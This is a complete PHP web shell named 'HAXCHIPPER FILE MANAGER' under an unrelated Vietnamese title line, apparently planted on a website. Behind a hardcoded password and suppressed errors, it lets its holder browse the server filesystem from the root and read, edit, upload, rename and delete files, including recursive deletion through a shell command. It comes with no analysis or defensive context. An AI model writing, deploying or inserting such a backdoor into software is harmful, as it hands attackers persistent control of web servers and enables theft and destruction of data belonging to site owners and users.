Viên ngọc phương Đông

<?php
/**
 * HAXCHIPPER FILE MANAGER - FINAL v2.1 (RENAME ADDED)
**/

// --- LOGIN PROTECTION ---
$password = "Crypth0nX"; 
session_start();
error_reporting(0);
$sessioncode = md5(__FILE__);

if(!empty($password) && $_SESSION[$sessioncode] != $password){
    if (isset($_REQUEST['pass']) && $_REQUEST['pass'] == $password) {
        $_SESSION[$sessioncode] = $password;
    } else {
        print "<style>
        body { background: #000; color: #fff; font-family: sans-serif; display: flex; align-items: center; justify-content: center; height: 100vh; margin: 0; }
        .login-box { border: 1px solid #333; padding: 25px; border-radius: 15px; background: #1a1a1a; text-align: center; }
        input[type='password'] { padding: 10px; border: 1px solid #444; background: #222; color: #fff; border-radius: 5px; margin: 10px 0; width: 200px; }
        input[type='submit'] { padding: 10px 20px; background: #53585d; color: #fff; border: none; border-radius: 5px; cursor: pointer; }
        </style>
        <div class='login-box'>
            <form method='post'>
                <h2>HAXCHIPPER</h2>
                <input type='password' name='pass' autofocus><br>
                <input type='submit' value='UNLOCK'>
            </form>
        </div>";
        exit;        
    }
}
session_write_close();

// --- CORE UTILITIES ---
function encode_path($p) { return base64_encode($p); }
function decode_path($p) { return base64_decode($p); }

$root_path = realpath($_SERVER['DOCUMENT_ROOT']);
$current_dir = realpath(isset($_GET['d']) ? decode_path($_GET['d']) : $root_path);
if (!$current_dir) $current_dir = $root_path;
chdir($current_dir);

$msg = "";

// --- ACTIONS HANDLER ---
if ($_SERVER['REQUEST_METHOD'] === 'POST') {
    // Rename Logic
    if (isset($_POST['old_name']) && isset($_POST['new_name'])) {
        $old = $current_dir . '/' . $_POST['old_name'];
        $new = $current_dir . '/' . $_POST['new_name'];
        if (rename($old, $new)) {
            $msg = "<div class='info'>RENAME SUCCESS: " . htmlspecialchars($_POST['new_name']) . "</div>";
        } else {
            $msg = "<div class='info' style='background:red;'>RENAME FAILED!</div>";
        }
    }
    // Upload
    if (isset($_FILES['filetos'])) {
        if (move_uploaded_file($_FILES["filetos"]["tmp_name"], $current_dir . '/' . basename($_FILES["filetos"]["name"]))) {
            $msg = "<div class='info'>UPLOAD SUCCESS</div>";
        }
    }
    // Create Folder/File
    if (!empty($_POST['folder_name'])) mkdir($current_dir . '/' . $_POST['folder_name']);
    if (!empty($_POST['file_name'])) file_put_contents($current_dir . '/' . $_POST['file_name'], "");
    
    // Save Edit
    if (isset($_POST['edit_file_name']) && isset($_POST['content'])) {
        file_put_contents($current_dir . '/' . $_POST['edit_file_name'], $_POST['content']);
        $msg = "<div class='info'>FILE SAVED</div>";
    }
    // Delete
    if (isset($_POST['delete_item'])) {
        $target = $current_dir . '/' . $_POST['delete_item'];
        if (is_dir($target)) {
            exec("rm -rf " . escapeshellarg($target));
        } else {
            unlink($target);
        }
        $msg = "<div class='info'>ITEM DELETED</div>";
    }
}
?>
<!DOCTYPE html>
<html>
<head>
    <title>HAXCHIPPER v2.1</title>
    <style>
        body { font-family: sans-serif; background: #0b0b0b; color: #eee; padding: 20px; }
        .container { background: #161616; padding: 20px; border-radius: 10px; border: 1px solid #222; }
        a { color: #00ff41; text-decoration: none; }
        .info { background: #004400; color: #fff; padding: 10px; margin-bottom: 15px; border-radius: 5px; }
        table { width: 100%; border-collapse: collapse; margin-top: 20px; }
        th { background: #222; padding: 10px; text-align: left; color: #888; }
        td { padding: 8px; border-bottom: 1px solid #222; }
        .btn { background: #333; color: #fff; border: none; padding: 4px 8px; border-radius: 4px; cursor: pointer; font-size: 11px; }
        .input-text { background: #222; border: 1px solid #333; color: #fff; padding: 5px; border-radius: 3px; }
        .nav-dir { background: #222; padding: 10px; border-radius: 5px; margin-bottom: 15px; }
        textarea { width: 100%; height: 300px; background: #000; color: #00ff41; font-family: monospace; }
    </style>
</head>
<body>

<div class="container">
    <div class="nav-dir">
        D1R: 
        <?php
        $accumulated = "";
        $parts = explode(DIRECTORY_SEPARATOR, trim($current_dir, DIRECTORY_SEPARATOR));
        if (DIRECTORY_SEPARATOR === '/') echo "<a href='?d=".encode_path('/')."'>/</a> ";
        foreach ($parts as $part) {
            $accumulated .= DIRECTORY_SEPARATOR . $part;
            echo "<a href='?d=".encode_path($accumulated)."'>".htmlspecialchars($part)."</a> / ";
        }
        ?>
    </div>

<?= $msg ?>

<?php if (isset($_POST['view_item'])): 
        $target = $current_dir . '/' . $_POST['view_item'];
        $content = htmlspecialchars(file_get_contents($target));
    ?>
    <form method="post">
        <textarea name="content"><?= $content ?></textarea>
        <input type="hidden" name="edit_file_name" value="<?= htmlspecialchars($_POST['view_item']) ?>">
        <input type="submit" class="btn" style="background:green" value="SAVE">
    </form>
    <?php endif; ?>

<table>
        <thead>
            <tr>
                <th>Name</th>
                <th>Size</th>
                <th>Perms</th>
                <th>Actions</th>
            </tr>
        </thead>
        <tbody>
            <?php
            $items = scandir($current_dir);
            foreach ($items as $item) {
                if ($item == "." || $item == "..") continue;
                $full = $current_dir . '/' . $item;
                $perm = substr(sprintf('%o', fileperms($full)), -4);
            ?>
            <tr>
                <td><?= is_dir($full) ? "📁" : "📄" ?> <a href="?d=<?= encode_path($full) ?>"><?= htmlspecialchars($item) ?></a></td>
                <td><?= is_dir($full) ? "-" : filesize($full) ?></td>
                <td><?= $perm ?></td>
                <td>
                    <form method="post" style="display:inline;"><input type="hidden" name="view_item" value="<?= $item ?>"><input type="submit" class="btn" value="EDIT"></form>
                    <form method="post" style="display:inline;"><input type="hidden" name="delete_item" value="<?= $item ?>"><input type="submit" class="btn" value="DEL"></form>
                    <form method="post" style="display:inline;">
                        <input type="hidden" name="old_name" value="<?= htmlspecialchars($item) ?>">
                        <input type="text" name="new_name" class="input-text" style="width:80px;" placeholder="New name">
                        <input type="submit" class="btn" value="REN">
                    </form>
                </td>
            </tr>
            <?php } ?>
        </tbody>
    </table>
</div>
</body>
</html>